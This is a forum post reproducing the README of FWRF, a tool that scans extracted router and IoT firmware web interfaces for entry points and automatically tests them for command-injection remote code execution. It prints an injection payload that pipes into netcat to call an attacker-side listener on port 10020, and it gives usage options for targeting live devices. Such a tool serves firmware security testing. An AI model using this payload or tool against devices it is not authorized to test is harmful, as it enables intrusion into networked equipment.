- Joined
- May 15, 2017
- Messages
- 983
- Likes
- 759
- Points
- 1,045
FWRF (don't try to pronounce it) is a open source tool for firmware web-side analysis.
Why FWRF?
Due to some stupids minds, the new trend is to put computers in everything. This poc was initially written for testing some wifi antennas firmware.
The only common element between linux-embedded stuff with web interface is the front side (html/js), the rest can be PHP (ubiquiti), ELF (netgear), some_new_hype_technology... Doesn't matter.
The Goal of FWRF is to find entrypoints, vulnerabilities and try to autosploit them.
How ?
FWRF is composed of 4 parts:
Firmware web rce finder
optional arguments:
-h, --help show this help message and exit
-s, --server run test server only for manual tests
-f BASE_FOLDER, --folder BASE_FOLDER
base folder of the extracted firmware
-r REMOTE_ADDRESS, --remote REMOTE_ADDRESS
Address of live machine (like 192.168.0.1)
-l LOCAL_ADDRESS, --local LOCAL_ADDRESS
Address of this machine (like 192.168.0.1)
-c COOKIES, --cookies COOKIES
Use cookies for authenticated parts
-v, --verbose Verbose mode
FWRF is not magic, it will only trigger obvious rce. But if you want to search further, it can help. First, use -f and -v parameters, the full list of entry points, parameters and http method is returned. Then, start the test server and search by yourself using the provided payload (or anything sending tcp packet on 10020).
Why FWRF?
Due to some stupids minds, the new trend is to put computers in everything. This poc was initially written for testing some wifi antennas firmware.
The only common element between linux-embedded stuff with web interface is the front side (html/js), the rest can be PHP (ubiquiti), ELF (netgear), some_new_hype_technology... Doesn't matter.
The Goal of FWRF is to find entrypoints, vulnerabilities and try to autosploit them.
How ?
FWRF is composed of 4 parts:
- File scan : Scan all files in extracted-firmware direcctory
- Entrypoint scan : extracts urls with args, forms, etc.
- Check rce : try basic code execution via thoses parameters
- Test server : Start a test server for manual search
- A server is started attacker-side (listening to port 10020) and waiting for a tcp packet.
- the payload sent to {insert here a hype-connected-device name} is echo\t1|nc\tattacker_ip\t10020
- in case of a dumb code (ex: exec("/bin/do_stuff --foobar $parameter") with controlled parameter, the packet is sent to attacker and FWRF know the attack success.
- Get the awesome tool Binwalk (http://binwalk.org/) and extract the firmware.bin
- mount/extract partition (sasquatch is great for this : https://github.com/devttys0/sasquatch)
- launch FWRF
- profit
Firmware web rce finder
optional arguments:
-h, --help show this help message and exit
-s, --server run test server only for manual tests
-f BASE_FOLDER, --folder BASE_FOLDER
base folder of the extracted firmware
-r REMOTE_ADDRESS, --remote REMOTE_ADDRESS
Address of live machine (like 192.168.0.1)
-l LOCAL_ADDRESS, --local LOCAL_ADDRESS
Address of this machine (like 192.168.0.1)
-c COOKIES, --cookies COOKIES
Use cookies for authenticated parts
-v, --verbose Verbose mode
- -s : start the test server, waiting for a tcp packet on port 10020
- -f : path to the extracted firmware partition
- -r : remote connected-stuff ip
- -l : attacker ip (used in payload generation)
- -c : cookies, if remote interface need authentication ("foo=bar&baz=gu")
- -v : show more stuff
FWRF is not magic, it will only trigger obvious rce. But if you want to search further, it can help. First, use -f and -v parameters, the full list of entry points, parameters and http method is returned. Then, start the test server and search by yourself using the provided payload (or anything sending tcp packet on 10020).